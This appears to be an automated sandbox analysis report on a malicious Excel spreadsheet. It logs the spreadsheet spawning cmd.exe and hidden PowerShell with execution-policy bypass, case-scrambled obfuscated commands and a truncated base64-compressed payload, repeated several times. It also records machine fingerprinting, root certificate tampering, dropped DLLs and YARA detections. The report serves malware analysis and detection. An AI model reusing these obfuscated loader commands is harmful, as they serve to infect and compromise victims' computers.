Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )

Language, Device and Operating System Detection:

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

Jump to behavior

Signature Similarity

Sample Distance (10 = nearest)

10 9 8 7 6 5 4 3 2 1

Similar Samples

Samplename	Analysis ID	SHA256	Similarity

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
14:44:44	API Interceptor	468x Sleep call for process: EXCEL.EXE modified
14:44:57	API Interceptor	6x Sleep call for process: powershell.exe modified

Antivirus Detection

Initial Sample

Source	Detection	Scanner	Label	Link
XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls	100%	Avira	X97M/Agent.1199011

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link	Download
https://ipinfo.ioH	0%	Avira URL Cloud	safe		Download File
https://ipinfo.ioh%	0%	Avira URL Cloud	safe		Download File

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\3ndkwphw.dll	Embedded_PE	unknown	unknown
C:\Users\user\AppData\Local\Temp\h2oah0u7.dll	Embedded_PE	unknown	unknown
C:\Users\user\AppData\Local\Temp\ua6j8io5.dll	Embedded_PE	unknown	unknown

Memory Dumps

Source	Rule	Description	Author
0000000C.00000002.1774294244.00330000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000002.1674260172.01880000.00000008.sdmp	Embedded_PE	unknown	unknown
0000000C.00000002.1774174716.00260000.00000008.sdmp	Embedded_PE	unknown	unknown
0000000C.00000002.1781857851.045C0000.00000008.sdmp	Embedded_PE	unknown	unknown
00000009.00000002.1774152919.00260000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000C.00000000.1713368455.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.1708252755.002A8000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000003.1637989998.001DA000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000002.1679049173.04370000.00000004.sdmp	Embedded_PE	unknown	unknown
00000004.00000003.1635248316.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.1705531360.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000002.1781647232.04430000.00000004.sdmp	Embedded_PE	unknown	unknown
0000000C.00000002.1780389444.03EA0000.00000008.sdmp	Embedded_PE	unknown	unknown
00000009.00000002.1774181408.00287000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000002.1774965388.00530000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000002.1672911724.00080000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000002.1677284178.01BB0000.00000008.sdmp	Embedded_PE	unknown	unknown
0000000C.00000002.1775135148.00620000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000002.1775563713.012C0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000002.1774443824.00470000.00000008.sdmp	Embedded_PE	unknown	unknown
00000004.00000002.1673377572.01260000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000000.1635094604.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000C.00000002.1774225767.002D0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000005.00000002.1650835635.00360000.00000002.sdmp	Embedded_PE	unknown	unknown
00000009.00000000.1705388458.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000002.1679114701.04400000.00000008.sdmp	Embedded_PE	unknown	unknown
00000004.00000002.1672890417.00060000.00000008.sdmp	Embedded_PE	unknown	unknown
0000000E.00000002.1736973475.00370000.00000002.sdmp	Embedded_PE	unknown	unknown
0000000C.00000003.1713665934.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000002.1673047466.00190000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000002.1774008438.000D0000.00000008.sdmp	Embedded_PE	unknown	unknown
00000004.00000002.1673224653.01080000.00000008.sdmp	Embedded_PE	unknown	unknown
00000009.00000002.1777041758.01AE0000.00000008.sdmp	Embedded_PE	unknown	unknown
0000000C.00000002.1774035610.000D0000.00000008.sdmp	Embedded_PE	unknown	unknown
0000000C.00000002.1781520586.04430000.00000004.sdmp	Embedded_PE	unknown	unknown
00000009.00000002.1781679900.04480000.00000008.sdmp	Embedded_PE	unknown	unknown
00000004.00000002.1673691174.01640000.00000008.sdmp	Embedded_PE	unknown	unknown
00000009.00000002.1774465519.004C0000.00000008.sdmp	Embedded_PE	unknown	unknown
00000004.00000002.1674343739.019B0000.00000002.sdmp	Embedded_PE	unknown	unknown
0000000C.00000002.1776428355.01790000.00000008.sdmp	Embedded_PE	unknown	unknown
0000000D.00000002.1736577833.00330000.00000002.sdmp	Embedded_PE	unknown	unknown
0000000C.00000002.1780569437.03F60000.00000002.sdmp	Embedded_PE	unknown	unknown
00000009.00000002.1780905680.03FA0000.00000002.sdmp	Embedded_PE	unknown	unknown

Unpacked PEs

Source	Rule	Description	Author
4.2.powershell.exe.4370000.6.unpack	Embedded_PE	unknown	unknown
4.2.powershell.exe.1880000.3.raw.unpack	Embedded_PE	unknown	unknown
12.2.powershell.exe.4430000.5.unpack	Embedded_PE	unknown	unknown
4.2.powershell.exe.60000.0.unpack	Embedded_PE	unknown	unknown
4.2.powershell.exe.1080000.1.unpack	Embedded_PE	unknown	unknown
9.2.powershell.exe.4480000.6.unpack	Embedded_PE	unknown	unknown
12.2.powershell.exe.45c0000.6.unpack	Embedded_PE	unknown	unknown
9.2.powershell.exe.d0000.0.unpack	Embedded_PE	unknown	unknown
4.2.powershell.exe.60000.0.raw.unpack	Embedded_PE	unknown	unknown
9.2.powershell.exe.4430000.5.raw.unpack	Embedded_PE	unknown	unknown
9.2.powershell.exe.d0000.0.raw.unpack	Embedded_PE	unknown	unknown
12.2.powershell.exe.260000.1.unpack	Embedded_PE	unknown	unknown
